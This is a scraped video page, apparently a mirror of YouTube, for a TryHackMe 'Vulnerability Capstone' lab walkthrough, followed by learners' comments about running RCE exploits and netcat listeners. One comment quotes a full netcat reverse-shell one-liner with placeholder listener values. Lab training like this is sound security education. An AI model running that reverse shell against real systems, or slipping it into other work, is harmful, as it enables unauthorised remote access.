Тёмный

Try Hack Me : Vulnerability Capstone 

stuffy24
Подписаться 20 тыс.
Просмотров 8 тыс.
50% 1

This is our continuation series of Junior pentesting learning path on tryhackme.com. We are done with vulnerabilities! Lets have some fun!
Patreon to help support the channel! Thank you so much!
/ stuffy24
Hacker Discord
/ discord

Опубликовано:

 

29 сен 2024

Поделиться:

Ссылка:

Скачать:

Готовим ссылку...

Добавить в:

Мой плейлист
Посмотреть позже
Комментарии : 72   
@SAinTIdiVAca
@SAinTIdiVAca 2 года назад
Dude I was sitting here trying to upload a reverse shell from the admin page and was like "Wait wait... I think I'm going out of bounds from where the room wants me to be"
@yephonethant126
@yephonethant126 2 года назад
your videos are very helpful mate!! kudos to you CHEERS!!!
@roseywinter
@roseywinter 8 месяцев назад
Thank you so much for this. I was definitely trying to do too much in my own, and got lost. Lol.
@Frenzaahh
@Frenzaahh Год назад
You always have the best explanation when I get stuck!
@stuffy24
@stuffy24 Год назад
Thank you man! I appreciate that!
@iccanui9053
@iccanui9053 2 года назад
thank you so much for walking through this one and teaching a bit. Sometimes its too easy to just paste the answer in when you find it because you want to get the badges or you think you know the basics or whatever. Im really trying to force myself to walk through each step to get it in my brain and improve, so thanks, this helped a lot.
@stuffy24
@stuffy24 2 года назад
That's the key!! That's why I try to explain for the few out there actually trying to learn it
@DIGITALEMPRESS
@DIGITALEMPRESS 2 года назад
That script keeps sending back “No result” for me.
@stuffy24
@stuffy24 2 года назад
You will have to join the discord or Patreon so you can send screenshots and the exact process. It's almost impossible to tell you what's wrong with no context. Our community and myself will try to help for sure though!
@teresarothaar6225
@teresarothaar6225 2 года назад
Me too.
@stuffy24
@stuffy24 2 года назад
@@teresarothaar6225 if you wanna throw as much info in the discord as possible it makes it much easier to help with what's going on
@teresarothaar6225
@teresarothaar6225 2 года назад
@@stuffy24 Done! It turned out that the problem was with me. Instead of giving the shell_me command the AttackBox IP, I was giving it the vulnerable machine's IP. DOH!
@stuffy24
@stuffy24 2 года назад
@@teresarothaar6225 great catch!
@JayJay-hb5ig
@JayJay-hb5ig Год назад
I looked up a guide because I knew as soon as I started getting errors in the python code I downloaded from git that there was a problem. After fixing and reading a couple of errors I thought "Ain't no way they expected someone off the street to just be able to edit python code like this." I should have read the hint.
@danmiller7709
@danmiller7709 2 года назад
I started with two different exploit py files, and both worked but one needed the OpenBSD reverse shell payload , and I'm mostly annoyed because I don't know exactly why. That exploit they provided ended up being much cleaner anyways. Thanks again!
@ds-hc8qy
@ds-hc8qy 8 месяцев назад
Sad to see this box still sucks.. it needs to be updated since it seems way out of scope for the Jr path
@brittislove
@brittislove Год назад
spending my christmas with my boi Stuffy24
@stuffy24
@stuffy24 Год назад
Let's go! Merry Christmas
@dreamysleepyzzz
@dreamysleepyzzz 2 года назад
Thank you for your explanation, i tried 3 of the RCE exploit, and tried to change what the cmd told me where there was error, i ran it with python3 as i didnt know there was a thing call python2 and related stuffs. Thanks so much, this makes me wonder what is python2 and will further look into it soon ;D
@stuffy24
@stuffy24 2 года назад
They are just different versions of python. Different releases! Thank you
@LBsTrades
@LBsTrades Год назад
great content and explanations! 💯💯💯
@stuffy24
@stuffy24 Год назад
Thanks so much!
@cryptochristian2056
@cryptochristian2056 2 года назад
Keep up the good work! I've been just using your videos when needed. However, when I'm all done with the certificate I think I might go back and watch all your videos for a good refresher!
@stuffy24
@stuffy24 2 года назад
Thank you! I appreciate thar
@brydiginte6552
@brydiginte6552 Год назад
I realized I was gonna have to edit the code but like damn im glad I just looked it up so messy lol
@soroushafshar2308
@soroushafshar2308 Год назад
Very good videos. Thank you mate
@chief4180
@chief4180 7 месяцев назад
I hate having to go through a walkthrough, I couldn't handle it myself. But thanks for sharing this. I watched 2 more walkthroughs for the same room and this was the only one that helped me. Again, thank you.
@stuffy24
@stuffy24 7 месяцев назад
Appreciate it!
@wolfyyybandz
@wolfyyybandz 9 месяцев назад
Really weird I had to set my listener to port 8082 for some reason 8081 would not work. It kept throwing an air but after 10 minutes of trying the same thing I decided to change something and guess what it worked.😂😂 thank you again this is making a lot more sense with these walkthroughs.
@stuffy24
@stuffy24 7 месяцев назад
Appreciate it. That is weird lol
@CyberAbyss007
@CyberAbyss007 4 месяца назад
Thank you! The Python script from searchsploit didn't work out of the box. I appreciate that you showed the alternate script location. That was a huge help.
@stuffy24
@stuffy24 3 месяца назад
Glad it helped!
@Startrakk989
@Startrakk989 11 месяцев назад
Excellent video. I like that you explain the python version as that was one of the issues I encountered editing the code.I didn't want to make excuses on this room even though I found it quite difficult. That being said you read my mind in regards to the room not being good. 👍
@stuffy24
@stuffy24 11 месяцев назад
Thank you!
@wolfyyybandz
@wolfyyybandz 9 месяцев назад
Wow 300 to 11k subs in a year cudos brother!
@stuffy24
@stuffy24 9 месяцев назад
Thanks my man !
@vinafl8064
@vinafl8064 8 месяцев назад
@@stuffy24 congrats bro, great explanation, tnx for that
@rutgalindo9938
@rutgalindo9938 Год назад
I was actuallly editing the code. Thank you for this video it was very helpful.
@stuffy24
@stuffy24 Год назад
Really glad it helped
@vacumecleaner
@vacumecleaner Год назад
Subbed. Dude i love your videos and you're perfect for my learning style
@stuffy24
@stuffy24 Год назад
Thanks so much! I really appreciate that!
@gazhough1
@gazhough1 Месяц назад
Wow thank you! I was trying to run the exploit from exploit-db and could not for the life of me work out why the word "system" was continuously appearing.
@PatrikLeng58
@PatrikLeng58 3 месяца назад
what a stupid room. Ty for guide tho
@stuffy24
@stuffy24 3 месяца назад
Not sure I agree but thank you for the kind words
@Alexi-pj4yb
@Alexi-pj4yb 3 месяца назад
Hi Stuffy24 ! lifesaver, you saved me again, I agree with you we shouldn't be manipulating the script. If they wanted us to do it they would've said something. You're by far the best teaching these rooms ! I even watched some rooms in Arabic, Hindi, to try to follow but everybody else does confusing things. Thank you again !
@stuffy24
@stuffy24 3 месяца назад
Appreciate the kind words. Thanks so much!
@Alexi-pj4yb
@Alexi-pj4yb 3 месяца назад
@@stuffy24 You are helping me get my degree in cybersecurity ! You have a fan ! 😊
@stuffy24
@stuffy24 3 месяца назад
@@Alexi-pj4yb well I appreciate the support! Make sure to hop in the discord for daily tips and more access to directly ask questions and things! Thanks again!
@henr2000
@henr2000 Год назад
you are amazing dude!!!
@stuffy24
@stuffy24 Год назад
Thank you! Appreciate the support man!
@brydiginte6552
@brydiginte6552 Год назад
Really appreciate the video!
@stuffy24
@stuffy24 Год назад
Thank you so much!
@ohee83
@ohee83 Год назад
Ended up with your walkthrough after watching several. Keep up the Good Work!
@stuffy24
@stuffy24 Год назад
Thank you so much!
@yejiz_nuts
@yejiz_nuts Год назад
This was a great walkthrough! I watched someone else's video before and it was so confusing but you explained it well
@stuffy24
@stuffy24 Год назад
Thank you!
@myname-mz3lo
@myname-mz3lo Год назад
thank you for explaining things instead of giving us the awnsers like other people do in writups . it helps me learn much more and so i dont get stuck again . legend
@stuffy24
@stuffy24 Год назад
Thank you for the support
@Z3kyTw0
@Z3kyTw0 Год назад
You have the best way of explaining things bro! love your channel man keep it going
@stuffy24
@stuffy24 Год назад
Thanks so much!
@דפנהרובין-פ9ד
@דפנהרובין-פ9ד 10 месяцев назад
HEY! How are you?! I Love your videos and how you explain things! Just wanted to ask a small question....I tried this got everything like you did, ran my netcat, however it didnt open a listener for some reason, I tried with sudo, changing ports, ran it a few times and I wasnt able to get a connection.... I checked the syntax, checked that I put in the right IP and everything.....I pinged it, it was working....So Im not so sure what Im doing wrong =].
@stuffy24
@stuffy24 10 месяцев назад
Please join the discord and throw your questions with screenshots under the questions channel
@cybermom3330
@cybermom3330 Год назад
Is anyone else expericing no results with the listener? I have tried this multiple times. Any suggesgtions? any help is gratly appreciated.
@stuffy24
@stuffy24 Год назад
Are you connected to the VPN? That's the most common thing I see
@cybermom3330
@cybermom3330 Год назад
@@stuffy24 I was using the wrong VPN.. Thank you
@unmuktyatree8200
@unmuktyatree8200 7 месяцев назад
you are a champ...i loved when you said "super easy"
@stuffy24
@stuffy24 7 месяцев назад
Appreciate it! Not sure if you mean that sarcastically?
@unmuktyatree8200
@unmuktyatree8200 7 месяцев назад
@@stuffy24 Not at all x2
@pranjalruhela1103
@pranjalruhela1103 Год назад
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc listenerIP listenerPort >/tmp/f They put this in the cmd: shell...and I don't get this whole thing...
@stuffy24
@stuffy24 Год назад
Hop in the discord and feel free to throw your questions in. We can cover them in detail and the Livestreams tonight so we can discuss
@discreteloner9573
@discreteloner9573 Год назад
I used the exploit I downloaded from exploit-db and got stuck at system: …. . No matter what I entered that, everything got stuck. As a newbie with little experience, watching several ways to hack this box seems overly complicated. I will use as you and THM suggested, the exploit in the attack box.
@stuffy24
@stuffy24 Год назад
I understand feeling overwhelmed but keep at it!
Далее
Try Hack Me: Network Services 2
46:43
Просмотров 3,4 тыс.
КВН 2024 Встреча выпускников
2:00:41
ХОККЕЙНАЯ КЛЮШКА ИЗ БУДУЩЕГО?
00:29
Try Hack Me : Metasploit: Meterpreter
24:31
Просмотров 10 тыс.
When you Accidentally Compromise every CPU on Earth
15:59
TryHackMe! PickleRick - BYPASSING Denylists
17:23
Просмотров 300 тыс.
THM -  Exploit Vulnerabilities Walkthrough
9:55
Try Hack Me: Sysinternals
36:26
Просмотров 4,5 тыс.
Try Hack Me : Nmap Live Host Discovery
34:26
Просмотров 7 тыс.
Tactics of Physical Pen Testers
44:17
Просмотров 904 тыс.
КВН 2024 Встреча выпускников
2:00:41